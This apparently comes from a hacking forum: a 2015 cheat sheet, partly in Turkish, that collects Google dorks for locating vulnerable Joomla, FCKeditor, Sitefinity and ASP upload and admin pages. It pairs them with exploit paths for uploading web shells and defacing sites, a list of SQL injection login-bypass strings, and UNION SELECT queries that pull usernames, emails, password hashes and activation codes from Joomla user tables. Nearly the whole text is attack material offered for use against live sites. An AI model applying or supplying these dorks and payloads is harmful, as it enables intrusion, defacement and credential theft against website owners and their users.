Exploit Dorks for Joomla,FCK and others 2015 Old but gold

1. inurl:”/admin/saveannounce_upload.asp”
2.  
3. inurl:”admin/eWebEditor/Upload.asp”
4.  
5. inurl:”UploadFile/upload.asp”
6.  
7. WEBWİZ ACİGİ (RTE UPLOAD ACIGI )
8.  
9. inurl:rte/my_documents/my_files/
10. inurl:/my_documents/my_files/
11. exloit: /rte/RTE_popup_file_atch.asp
12.  
13. Editör açığı
14.  
15. inurl:editor/assetmanager/ (arama kodu geliştirilebilir)
16.  
17. EXPLOİT : /Editor/assetmanager/assetmanager.asp
18.  
19. Joomla upload açıgı
20.  
21. inurl index.php?option=com_expose
22.  
23. Exploit: administrator/components/com_expose/uploadimg.php
24. Uploadin gittigi yer : /components/com_expose/expose/img/
25.  
26. Sitefinity: Login upload açıgı
27.  
28. inurl:”Sitefinity: Login”
29. exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
30.  
31.  
32.  
33.  
34. Auto Login For Joomla Dork .:old:.
35. inurl:/administrator/index.php?autologin=1
36.  
37.  
38.  
39. ---
40. BYPASS ADMIN ACCESS
41.  
42. Dorks:
43. Code:
44. inurl:admin.asp
45. inurl:adminlogin.aspx
46. inurl:admin/index.php
47. inurl:administrator.php
48. inurl:administrator.asp
49. inurl:login.asp
50. inurl:login.aspx
51. inurl:login.php
52. inurl:admin/index.php
53. inurl:adminlogin.aspx
54.  
55. Code:
56. ‘ or 1=1 –
57. 1'or’1'=’1
58. admin’–
59. ” or 0=0 –
60. or 0=0 –
61. ‘ or 0=0 #
62. ” or 0=0 #
63. or 0=0 #
64. ‘ or ‘x’='x
65. ” or “x”=”x
66. ‘) or (‘x’='x
67. ‘ or 1=1–
68. ” or 1=1–
69. or 1=1–
70. ‘ or a=a–
71. ” or “a”=”a
72. ‘) or (‘a’='a
73. “) or (“a”=”a
74. hi” or “a”=”a
75. hi” or 1=1 –
76. hi’ or 1=1 –
77. hi’ or ‘a’='a
78. hi’) or (‘a’='a
79.  
80. ----
81. Joomla Component com_smartformer shell upload
82.  
83. Google Dork inurl:"index.php?option=com_smartformer"
84. & upload shell.php
85.  
86. Your shell :
87. http://localhost/components/com_smartformer/files/yourshell.php
88.  
89. ---
90. Ministry Web Designing Multiple Vulnerabilities
91. exploit bypass to login:
92. user: '=' 'or'
93. pass: '=' 'or'
94.  
95. Vunlerable Sections:
96.  
97. inurl:/downloadcounter/admin/login.php
98. inurl:/mediaprogram/admin/index.php
99. inurl:/churchprogram/login.php
100. ----
101. (Deface)Exploit (Remote Deface ) Joomla Component
102. Dork : inurl:index.php?option=com_fabrik
103. Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
104. ---
105. [Priv8] Joomla Com_content exploit - defacing joomla websites
106.  
107. Dork :
108. inurl:index.php?option=com_content & "/mambots/editors/fckeditor"
109.  
110. Vulnerable File :
111. mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
112.  
113. You can exploit this vulnerable joomla component and deface joomla wesbites and you can also sometimes upload your shell
114. ----
115. exploit joomla "com_artforms" reset password
116.  
117.  
118. Dork : inurl:"option com_artforms"
119.  
120. /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
121.  
122. /index.php?option=com_user&view=reset
123.  
124. /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users